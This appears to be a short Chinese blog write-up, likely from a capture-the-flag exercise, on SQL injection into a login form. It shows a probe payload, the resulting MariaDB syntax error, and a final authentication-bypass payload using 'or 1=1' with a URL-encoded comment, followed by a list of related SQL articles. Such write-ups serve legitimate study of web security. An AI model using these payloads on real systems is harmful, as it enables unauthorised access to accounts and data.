SQL注入

username and password

初步检验

?username=1' and 1=1 &password=1' and 1=1

报错：You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' and password='1' and 1=1'' at line 1

得出注入点在password，因此闭合username，并且注释password后面的语句（%23为#）

?username=1 or 1=1&password=1' or 1=1%23

本栏目推荐文章
• SQL Server 检测是不是数字型数据的两种方法
• SQL Join的一些总结
• SQL Server 高性能写入的一些总结
• 网络攻击技术开篇——SQL Injection
• SQL SERVER日期时间转字符串
• sql server 保留2位小数
• DBEAVER 23.0.2 调整SQL编辑器字体大小 ver:20240112
• 用友 U9 【料品表】全字段Sql输出
• sql server 2012配置备份
• SQL Server 数据库备份成sql文件